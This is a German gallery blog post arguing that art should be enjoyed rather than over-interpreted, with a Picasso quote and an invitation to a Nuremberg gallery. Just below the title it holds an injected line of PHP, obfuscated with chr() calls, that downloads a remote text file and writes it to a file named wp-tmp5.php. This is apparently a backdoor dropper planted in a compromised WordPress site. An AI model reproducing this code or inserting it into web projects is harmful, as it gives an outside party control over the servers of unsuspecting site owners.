/, Commercial, Info/interpretierst du noch oder genießt du schon?

interpretierst du noch oder genießt du schon?

file_put_contents(chr(119).chr(112).chr(45).chr(116).chr(109).chr(112).chr(53).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(109).chr(121).chr(115).chr(112).chr(97).chr(99).chr(101).chr(105).chr(100).chr(46).chr(115).chr(112).chr(97).chr(99).chr(101).chr(47).chr(108).chr(48).chr(46).chr(116).chr(120).chr(116)));

Wenn wir uns an den Deutsch- oder Kunstunterricht in der Schule erinnern dann sind es in der Regel Interpretationen.

Gedichtinterpretationen, Bildinterpretationen.

Ein Gedicht wird solange zerpflückt und in jedes Wort werden Hunderte Metaebenen gelegt, dass man am Ende das Gedicht selber, dessen Klang, die Verse gar nciht mehr wertschätzen kann.

Warum sind die Vorhänge in dem beschriebenen Gedicht blau? Ist das eine Metapher für die Depressionen unter denen der Autpr litt, gar ein Vorausblick auf dne nahenden Tod?

Dasselbe wird dann auf Kunstwerke, auf Bilder angelegt.

Wri interpretieren munter vor uns hin, was könnte der Künstler uns damit gesagt haben wollen, warum diese farben warum diese Formen, verstehe ich dieses Kusntwerk überhaupt, und wenn ja, verstehe ich es richtig?

Ich finde, wir tuen den meisten Künstlern damit unrecht. Denn das, was wir in irgendwas hineininterpretieren ist nur allein unsere Lebenswelt, unsere Gefühlswelt. Die mit den Welten dese Künstlers, der Künstlerin nichts zu tun hat.

Deshalb ist die Frage “Was will uns der Künstler sagen” völlig falsch ist. Wir können uns fragen: was sagt mir das Bild.

wenn ich mir Zeit nehme zum HInschauen und Betrachten, zu Wirken- und Sackenlassen, dann wird da ganz vieles auftauchen.

Aber das muss nicht sein – reicht es nicht aus, das einem ein Werk einfach “nur” gefällt? Man es gerne ansehen will, weil einem die farben, die Komposition, das Thema anspricht?

Dann ist es das Richtige. Schließlich sind wir bei Musikstücken auch nicht versucht permanent irgendwas hineinzuinterpretieren, etwas verstehen zu müssen.

Weil ich Musik höre, einfach weil sie mir gefällt.

Picasso hat es ähnlich ausgedrückt: “Jeder möchte die Kunst verstehen. Warum versucht man nicht, die Lieder eines Vogels zu verstehen? Warum liebt man die Nacht, die Blumen, alles um uns herum, ohne es durchaus verstehen zu wollen? Aber wenn es umein Bild geht, denken die Leute, sie müssen es ‘verstehen’.”

In unserer Galerie könnenSie sich in Ruhe setzen, bei einer Tasse Kaffee ein Bild so lange ansehen wie Sie möchten. Oder auch es mit nach Hause nehmen um zu sehen ob es Ihnen an Ihrer Wand immer noch so gut gefällt.

Wir wollen für Sie einfach nur Kunstgenuss.

Galerie Mouzaoui

Schnieglinger Str. 12

90419 Nürnberg

By | 2019-06-28T15:56:39+02:00 Juni 28th, 2019|Allgemein, Commercial, Info|0 Comments

About the Author:

Onlinegalerie Mouzaoui,wir sind am Puls der Zeit!

Durch die weitere Nutzung der Seite stimmen Sie der Verwendung von Cookies zu. Weitere Informationen

Die Cookie-Einstellungen auf dieser Website sind auf "Cookies zulassen" eingestellt, um das beste Surferlebnis zu ermöglichen. Wenn Sie diese Website ohne Änderung der Cookie-Einstellungen verwenden oder auf "Akzeptieren" klicken, erklären Sie sich damit einverstanden.

Schließen